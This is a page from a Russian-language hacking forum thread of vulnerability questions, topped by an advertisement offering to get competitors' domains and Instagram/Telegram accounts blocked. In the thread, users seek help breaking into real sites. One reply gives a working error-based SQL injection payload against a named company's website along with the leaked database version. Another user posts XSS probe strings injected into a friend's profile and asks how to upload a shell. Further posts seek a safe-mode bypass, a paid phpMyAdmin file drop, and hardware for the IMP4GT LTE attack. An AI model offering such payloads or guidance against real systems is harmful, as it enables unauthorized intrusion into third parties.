УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 295 из 296

295

Опции темы

Поиск в этой теме

Опции просмотра

#2941

29.04.2022, 19:03

1NtR0

Участник форума

Регистрация: 14.04.2007

Сообщений: 197

Провел на форуме:
1122391

Репутация: 209

Подскажите реально ли что-то сделать в таком случае?

Код:

Code:
$ch = curl_init('http://site.com/page.php?file='.$_GET['file']);

#2942

29.04.2022, 22:59

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от eminlayer7788

eminlayer7788 said:
↑
Hi
Any method/exploit for PHP 5.6.40 safe mode bypass ?
Thanks !

Apache or Nginx?

Цитата:

Сообщение от holdik

holdik said:
↑
Может кто-нибудь пролить файл через phpmyadmin 3.3.7 ? Нужна любая полезная информация, за вознаграждение

Версия довольна старая. Если есть маломальский доступ внутрь, то вариантов должна быть куча. Из проверенного старья, можно что-то посмотреть здесь https://rdot.org/forum/showthread.php?t=286

Цитата:

Сообщение от 1NtR0

1NtR0 said:
↑

Код:

Code:
$ch = curl_init('http://site.com/page.php?file='.$_GET['file']);

Думаю, что ничего интересного.

#2943

30.04.2022, 11:06

eminlayer7788

Guest

Сообщений: n/a

Провел на форуме:
36807

Репутация: 1

Цитата:

Сообщение от crlf

crlf said:
↑
Apache or Nginx?
Версия довольна старая. Если есть маломальский доступ внутрь, то вариантов должна быть куча. Из проверенного старья, можно что-то посмотреть здесь
https://rdot.org/forum/showthread.php?t=286
Думаю, что ничего интересного.

Apache

#2944

30.04.2022, 23:24

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от eminlayer7788

eminlayer7788 said:
↑
Apache

This exploit can be modified, but requires low level skills. Unfortunately, I haven't seen any simple bypasses.

#2945

09.05.2022, 14:29

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

помогите раскрутить

Код:

Code:
https://www.egtexpress.com/ru/country/slovinsko"/

#2946

11.05.2022, 04:50

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
помогите раскрутить

Код:

Code:
https://www.egtexpress.com/ru/country/slovinsko"/

Код:

Code:
/ru/country/slovinsko"and(extractvalue(1,concat(0x3a,(select@@version))))="1/

Код:

Code:
XPATH syntax error: ':10.0.35-MariaDB

#2947

23.05.2022, 13:18

dread3nergy

Guest

Сообщений: n/a

Провел на форуме:
291

Репутация: 0

Здравствуйте , я тут недавно , по этому если обращаюсь не в ту тему , прошу не кидать ссаны тряпками , а вросто отправить на поиски в нужном направлении.

Поиск по форуму моего вопроса показал мне пустую страницу , по этому задам вопрос тут.

Подскажите пожалуйста , где можно на русском языке найти информацию по IMP4GT?

Само собой интересует не статьи о том насколько это страшно, а реальная информация , прежде всего какой необходим инструментарий для реализации. Если информации на великомогучем нет , подойдут и буржуйские источники.

Заранее спасибо.

#2948

23.05.2022, 20:03

fandor9

Guest

Сообщений: n/a

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от dread3nergy

dread3nergy said:
↑
Здравствуйте , я тут недавно , по этому если обращаюсь не в ту тему , прошу не кидать ссаны тряпками , а вросто отправить на поиски в нужном направлении.
Поиск по форуму моего вопроса показал мне пустую страницу , по этому задам вопрос тут.
Подскажите пожалуйста , где можно на русском языке найти информацию по
IMP4GT
?
Само собой интересует не статьи о том насколько это страшно, а реальная информация , прежде всего какой необходим инструментарий для реализации. Если информации на великомогучем нет , подойдут и буржуйские источники.
Заранее спасибо.

Ну на сайте стоит что использовался стек srsLTE, ну и к тому же понадобится как минимум SDR который работает на частотах LTE (например limeSDR), хотя конкретно они использовали 2х Ettus USRP B210 (глава V.Setup)

#2949

09.06.2022, 19:54

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от eminlayer7788

eminlayer7788 said:
↑
sql injection ?

nope

#2950

10.06.2022, 13:23

signlog

Guest

Сообщений: n/a

Провел на форуме:
307

Репутация: 0

Всем привет, я только начинающий и тема вся эта интересна не в корыстных целях. Буду признателен за помощь.

Нашёл уязвимость на сайте своего друга, следующего вида:

Код:

Code:
Text' -->">'>'"

Данную уязвимость нашел в профиле, т.е. сделал вход в аккаунт-> перешел в редактировать профиль и в любой их строг, будь то логин, город, имя - вводиться данные строки.

На выходе получаю:

.SpoilerTarget" type="button">Spoiler: ScreenShot

Далее начал развивать тему загрузки шелла, подгрузил кнопку загрузки:

Код:

Code:
New York' -->">

'>'"

Выбираю файл, нажимаю Upload (загрузка файла, в не зависимости какой, хоть картинку), форма загрузки пропадает и все, далее ничего нет. загрузился ли файл не известно, по пути пытался пройти не нашел.

Куда копать и возможно ли как то по другому загрузить шелл или получить данные базы данных.